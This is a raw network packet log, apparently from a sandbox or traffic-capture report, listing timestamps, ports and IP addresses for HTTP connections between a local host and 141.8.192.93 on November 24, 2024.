Nov 24, 2024 04:03:38.458873987 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.463675022 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.465487957 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.465557098 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.465636015 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.470501900 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.470566988 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.474155903 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.475450039 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.475553989 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.475603104 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.480338097 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.482160091 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.483716011 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.603153944 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.919651031 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.919698954 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.919754982 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.921438932 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.922141075 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.922245979 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.922259092 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.925882101 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.925931931 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.925941944 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.928778887 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.928833008 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.928869963 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.932554960 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.932643890 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.932651043 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.936274052 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.936325073 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.936361074 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.940032005 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.940083027 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.940118074 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.943775892 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.943825960 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.943885088 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.947531939 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.947582960 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.947597027 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.951284885 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.951339960 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.951373100 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.955013990 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.955077887 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.955090046 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.958775043 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:38.958822012 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:38.958822966 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.000677109 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.033951044 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.034096003 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.034183979 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.035784960 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.035897017 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.035947084 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.039509058 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.040889978 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.040923119 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.040955067 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.044696093 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.044750929 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.044763088 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.048396111 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.048440933 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.048484087 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.052114964 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.052206993 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.052258968 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.056015015 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.056073904 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.056078911 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.059600115 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.059649944 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.059695959 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.063395023 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.063440084 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.063443899 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.067125082 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.067178965 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.067192078 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.070822001 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.070874929 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.070918083 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.074522018 CET	80	49897	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:39.074584007 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:39.077204943 CET	49897	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:43.449561119 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:43.569137096 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:43.569226027 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:43.569474936 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:43.689129114 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881736040 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881758928 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881772041 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881827116 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881838083 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881848097 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881859064 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881860018 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:44.881896019 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:44.881968975 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881980896 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881990910 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:44.881994963 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:44.882008076 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:44.882080078 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.001584053 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.001641035 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.001723051 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.074035883 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.074081898 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.074176073 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.078042984 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.078154087 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.078206062 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.086393118 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.086487055 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.086729050 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.094770908 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.094866037 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.095134974 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.103231907 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.103269100 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.103317022 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.111526012 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.111663103 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.111717939 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.119904041 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.119987011 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.120047092 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.128294945 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.128386974 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.128428936 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.136653900 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.136761904 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.136823893 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.145081997 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.145158052 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.145263910 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.153403044 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.153482914 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.153703928 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.265773058 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.265806913 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.265954018 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.268198013 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.268300056 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.268358946 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.272102118 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.272191048 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.274163008 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.277209997 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.277285099 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.277353048 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.282138109 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.282255888 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.286256075 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.287198067 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.287300110 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.287712097 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.292018890 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.292160034 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.292218924 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.299897909 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.419440985 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.727030993 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.727196932 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.727293968 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.729336023 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.730228901 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.730292082 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.730317116 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.735074997 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.735141993 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.735194921 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.739892006 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.739974976 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.740021944 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.744751930 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.744815111 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.744862080 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.749581099 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.749640942 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.749659061 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.754393101 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.754462957 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.754503965 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.759224892 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.759279013 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.759349108 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.764096975 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.764147043 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.764245033 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.768918037 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.768978119 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.769013882 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.773751974 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.773813009 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.773849010 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.778582096 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.778642893 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.778683901 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.828924894 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.841617107 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.841733932 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.841825008 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.843013048 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.843130112 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.843189001 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.847863913 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.847975016 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.848042965 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.852710962 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.852792978 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.852854013 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.857530117 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.857628107 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.857677937 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.862379074 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.862484932 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.862533092 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.867203951 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.867288113 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.867347956 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.872035980 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.872143030 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.872195005 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.876863956 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.876981974 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.877072096 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.881675959 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.881818056 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.881870031 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.886507034 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.918792009 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.918848991 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.918956041 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.921209097 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.921260118 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:03:45.921273947 CET	80	49913	141.8.192.93	192.168.2.5
Nov 24, 2024 04:03:45.923782110 CET	49913	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:01.761385918 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:01.880975008 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:01.881206989 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:01.881330967 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:02.000767946 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.284887075 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.284953117 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.284964085 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285011053 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285023928 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285101891 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285114050 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285130978 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285144091 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285144091 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.285157919 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.285180092 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.285180092 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.285180092 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.285223961 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.404767036 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.404875994 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.405109882 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.408881903 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.453824997 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.496068001 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.496140003 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.496220112 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.500170946 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.500266075 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.500313997 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.508585930 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.508666992 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.508713961 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.516957045 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.517049074 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.517091036 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.525304079 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.525398970 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.525679111 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.533701897 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.533813953 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.533854008 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.542062998 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.542171001 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.542217970 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.550448895 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.550528049 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.550575018 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.558830023 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.558936119 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.558975935 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.567194939 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.567284107 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.568254948 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.575575113 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.575681925 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.575726986 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.615747929 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.615931034 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.616219044 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.707007885 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.707191944 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.707423925 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.709626913 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.709734917 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.709881067 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.714904070 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.716916084 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.716974020 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.717020035 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.722168922 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.722270012 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.722311974 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.727454901 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.727571011 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.727617025 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.732728958 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:03.736444950 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.737644911 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:03.857055902 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.183362007 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.183418036 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.183465958 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.184417009 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.184531927 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.184571028 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.188234091 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.188348055 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.188389063 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.192054987 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.192158937 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.192207098 CET	49955	80	192.168.2.5	141.8.192.93
Nov 24, 2024 04:04:04.195861101 CET	80	49955	141.8.192.93	192.168.2.5
Nov 24, 2024 04:04:04.195990086 CET	80	49955	141.8.192.93	192.168.2.5
